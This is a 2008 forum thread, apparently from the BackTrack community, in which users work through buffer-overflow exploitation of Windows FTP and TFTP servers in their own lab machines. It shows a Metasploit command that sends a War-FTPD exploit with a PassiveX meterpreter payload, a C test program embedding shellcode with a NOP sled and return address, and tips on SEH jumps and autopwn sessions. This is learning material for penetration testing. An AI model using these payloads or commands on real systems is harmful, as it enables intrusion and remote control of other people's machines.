Recreating Buffer Overflow

**Armagedeon** · 06-19-2008, 05:03 AM

OK forget about PassiveX

Framework users guide:
"The PassiveX payloads will only work when the target system has Internet Explorer 6.0 installed (not 5.5 or 7.0)"

But any luck with win32_reverse_vncinject ??

**imported_l1nuxant_ee** · 06-19-2008, 05:32 AM

Originally Posted by Armagedeon

UnnamedOne

Try using my ret \x50\x69\xC9\x74

l1nuxant_ee

I've achieved success with TFTPServerSPInstallerV1.41.
If you want I can post my scripts...

But now I've a new doubt.
I'm trying the Msfweb (Metasploit) interface to launch automated exploits

I'm trying win32_reverse_vncinject against War-FTPD 1.65... because it has an automated payload for XP SP2

I can see that a courtesy shell appears in the victim but I get no VNC window to show up in my attacking machine, could you please try it to see if you achieve success?
Get back to me when you can. Thanks

P.S.- By the way, could you try PassiveX to. I wasn't able to use it... Is there a patch in XP SP2 against PassiveX?

This is my prompt:

Code:

bt framework2 # ./msfcli warftpd_165_user RHOST=YYY.YYY.YYY.YYY PAYLOAD=win32_passivex_meterpreter TARGET=3 PXHTTPHOST=XXX.XXX.XXX.XXX PXHTTPPORT=80 E
[*] Starting PassiveX Handler on XXX.XXX.XXX.XXX:80.
[*] Trying Windows XP SP2 English using return address 0x71ab9372....
[*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
[*] Sending evil buffer....
[*] Sending PassiveX main page to client...
[*] Sending PassiveX DLL in HTTP response (106496 bytes)...
[*] Exiting PassiveX Handler.#

Well done, Really I havent tried it yet.
From the previous one I was interested to learn the short jump command, and when to use it. Also how to check the SEH handler.
BTW, i have used jmp EBP in it instead of jmp ESI, and it worked

If you can post ur thoughts on the last exploit. What you have learnt from it, what was difficult.

**compaq** · 06-20-2008, 09:27 PM

Hi I tryed greating a program and then overflow the buffer with the below code. When I run it in ollydbg ecx fills up with FFFFFFFF and then starts counting down until ffffffe0 and then moves to 0000061
Any guidence please

Code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>


int main()
{
char store[10],overflow[10000] = {"aaaaaaaaaaaaaaaaaaaa\x5c\xbd\xe2\x77\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xba\xb4\x9a\x03\x83\xeb\xfc\xe2\xf4\x46\xde\x71\x4e\x52\x4d\x65\xfc\x45\xd4\x11\x6f\x9e\x90\x11\x46\x86\x3f\xe6\x06\xc2\xb5\x75\x88\xf5\xac\x11\x5c\x9a\xb5\x71\x4a\x31\x80\x11\x02\x54\x85\x5a\x9a\x16\x30\x5a\x77\xbd\x75\x50\x0e\xbb\x76\x71\xf7\x81\xe0\xbe\x2b\xcf\x51\x11\x5c\x9e\xb5\x71\x65\x31\xb8\xd1\x88\xe5\xa8\x9b\xe8\xb9\x98\x11\x8a\xd6\x90\x86\x62\x79\x85\x41\x67\x31\xf7\xaa\x88\xfa\xb8\x11\x73\xa6\x19\x11\x43\xb2\xea\xf2\x8d\xf4\xba\x76\x53\x45\x62\xfc\x50\xdc\xdc\xa9\x31\xd2\xc3\xe9\x31\xe5\xe0\x65\xd3\xd2\x7f\x77\xff\x81\xe4\x65\xd5\xe5\x3d\x7f\x65\x3b\x59\x92\x01\xef\xde\x98\xfc\x6a\xdc\x43\x0a\x4f\x19\xcd\xfc\x6c\xe7\xc9\x50\xe9\xe7\xd9\x50\xf9\xe7\x65\xd3\xdc\xdc\x8b\x5f\xdc\xe7\x13\xe2\x2f\xdc\x3e\x19\xca\x73\xcd\xfc\x6c\xde\x8a\x52\xef\x4b\x4a\x6b\x1e\x19\xb4\xea\xed\x4b\x4c\x50\xef\x4b\x4a\x6b\x5f\xfd\x1c\x4a\xed\x4b\x4c\x53\xee\xe0\xcf\xfc\x6a\x27\xf2\xe4\xc3\x72\xe3\x54\x45\x62\xcf\xfc\x6a\xd2\xf0\x67\xdc\xdc\xf9\x6e\x33\x51\xf0\x53\xe3\x9d\x56\x8a\x5d\xde\xde\x8a\x58\x85\x5a\xf0\x10\x4a\xd8\x2e\x44\xf6\xb6\x90\x37\xce\xa2\xa8\x11\x1f\xf2\x71\x44\x07\x8c\xfc\xcf\xf0\x65\xd5\xe1\xe3\xc8\x52\xeb\xe5\xf0\x02\xeb\xe5\xcf\x52\x45\x64\xf2\xae\x63\xb1\x54\x50\x45\x62\xf0\xfc\x45\x83\x65\xd3\x31\xe3\x66\x80\x7e\xd0\x65\xd5\xe8\x4b\x4a\x6b\x4a\x3e\x9e\x5c\xe9\x4b\x4c\xfc\x6a\xb4\x9a\x03"};
    strcpy(store,overflow);
    return 0;
}

In the bottom right of ollydbg the address is 0012d898 at the last of the 0x90

**compaq** · 06-21-2008, 03:58 AM

I have changed my code around abit "AAAAAAAAAAAA" + "\xac\xfd\x12\x00" + "about 20 nops" + shell code
The xac\xfd... point to the middle of the nops and inthe debugger it gets direct to the it then the shell code, but I still don't get a shell. The program crash. The overflow buffer goes into a 8 char buffer.

Thanks
James

**imported_l1nuxant_ee** · 06-21-2008, 06:06 AM

Originally Posted by compaq

I have changed my code around abit "AAAAAAAAAAAA" + "\xac\xfd\x12\x00" + "about 20 nops" + shell code
The xac\xfd... point to the middle of the nops and inthe debugger it gets direct to the it then the shell code, but I still don't get a shell. The program crash. The overflow buffer goes into a 8 char buffer.

Thanks
James

Well, I would advice to start in incremental fashion in trying to exploit. I mean make your buffer contains only A's. If you got a crash, try to find when your EIP is filled. Then try to put a suitable jmp in the EIP, and use "\xCC" instead of your shell. (The "\xCC" is for debugging) so if ur jmp works correctly, in Olly you should jmp into your "\xCC", then replace the "\xCC" with your shell, and it should work.

**Armagedeon** · 06-21-2008, 01:42 PM

Hi there l1nuxant_ee

Basically what I understood from it was that the small jump overwrites the pointer to the next SH handler, the following 4 bits should be your ret to your shell code.
You use this kind of exploits when you see that your buffer overwrote one of those sections that contained a SEH handler...

How is it going with TFTPServerSPInstallerV1.41??
That one is an interesting one too...

In concern to the win32_reverse_vncinject against War-FTPD 1.65 with the msfweb interface I couldn't achieve success,it crashed the server all the time, but opened a shell....

Well I decided to try it with another Ftp server CesarFTP and finally achieved success with that payload...

Moving on ... I'm now toying around with "autopwn", great tool, except it never achieves to give me a shell...

I've tried it with WarFTP, CesarFTP and an Apache server that was vulnerable...

I'm able to lunch successful attacks against these applications, has you have seen, but "autopwn" isn't

Have you tried it before?

Best regards.

**imported_l1nuxant_ee** · 06-22-2008, 01:59 AM

Originally Posted by Armagedeon

Hi there l1nuxant_ee

Basically what I understood from it was that the small jump overwrites the pointer to the next SH handler, the following 4 bits should be your ret to your shell code.
You use this kind of exploits when you see that your buffer overwrote one of those sections that contained a SEH handler...

How is it going with TFTPServerSPInstallerV1.41??
That one is an interesting one too...

In concern to the win32_reverse_vncinject against War-FTPD 1.65 with the msfweb interface I couldn't achieve success,it crashed the server all the time, but opened a shell....

Well I decided to try it with another Ftp server CesarFTP and finally achieved success with that payload...

Moving on ... I'm now toying around with "autopwn", great tool, except it never achieves to give me a shell...

I've tried it with WarFTP, CesarFTP and an Apache server that was vulnerable...

I'm able to lunch successful attacks against these applications, has you have seen, but "autopwn" isn't

Have you tried it before?

Best regards.

I will be working on the TFTP Windows Server.

Regarding autopwn, I have worked on it. if you got a successful attack, a session should be returned to you. To check if you have any active sessions, type:

Code:

sessions -l

this will list your active sessions.
and to use on of the listed sessions, type:

Code:

sessions -i %

where % represents the number of the sessions (such as 1, 2....)

Try it, and tell me what happens with you.

BTW, hard luck for having Portugal out of Euro 2008

**Armagedeon** · 06-22-2008, 08:08 AM

Hello l1nuxant_ee

Please letts not talk about catastrofies.... (Portugal out of Euro2008)

Our goal kepper sucks.... but the coach loved him....

In concern to Autopwn I runned the command "sessions -l" but it returned no sessions..

I don't understand it...
I'm able to lunch attacks via Metasploit web interface and via console... my understanding of Autopwn is that it should do the same but automaticaly...
In an exploit the only thing that changes are the return addresses of the libraries, that are suposed to be static across service packs, so since Nmap detects my OS has XP SP0/SP1, and since Autopwn is using the same exploites that come within the Framework, Autopwn should be able to lunch them successfully against my aplications, since I'm able to do the same, it shouldn't matter that I'm running a XP SP2, or should it??

Is my line of thought incorrect?? Could you please comment.

**imported_l1nuxant_ee** · 06-22-2008, 10:28 AM

Originally Posted by Armagedeon

Hello l1nuxant_ee

Please letts not talk about catastrofies.... (Portugal out of Euro2008)

Our goal kepper sucks.... but the coach loved him....

In concern to Autopwn I runned the command "sessions -l" but it returned no sessions..

I don't understand it...
I'm able to lunch attacks via Metasploit web interface and via console... my understanding of Autopwn is that it should do the same but automaticaly...
In an exploit the only thing that changes are the return addresses of the libraries, that are suposed to be static across service packs, so since Nmap detects my OS has XP SP0/SP1, and since Autopwn is using the same exploites that come within the Framework, Autopwn should be able to lunch them successfully against my aplications, since I'm able to do the same, it shouldn't matter that I'm running a XP SP2, or should it??

Is my line of thought incorrect?? Could you please comment.

You are correct on that. The idea of autopwn is to load known exploits based on the result returned by NMAP, and to try these exploits, and assign sessions if an exploit successed.

how are you using autopwn ? do you use it using Fast|Track, if so, have you updated autopwn ??

**Armagedeon** · 06-23-2008, 07:22 PM

Hello l1nuxant_ee

After I installed Win2k and Win XP SP1 in VMware I obtained success in the PassiveX payload, and Autopwn was able to lunch successful exploits to against the XP SP1 box

Nevertheless Autopwn steel stalls in the middle of some exploits

I have used Autopwn alone and I have used Fast|Track and told it to update himself

but it steel crashes or stalls for so long that I decide to punch Return to go to the console... But at least now it obtained three shells on the unpatched XP SP1

I steel haven't tried it against the XP SP2 box but I haven't quit yet

When your are finished with TFTPServerSPInstallerV1.41 he have to talk about CesarFTP0.99g, this one has me stunned hit a dead end and don't know how t deal with it...

Need your help, but it can wait

Best regards

BackTrack Linux - Penetration Testing Distribution

Thread: Recreating Buffer Overflow

Thread Tools

Search Thread

Display

Posting Permissions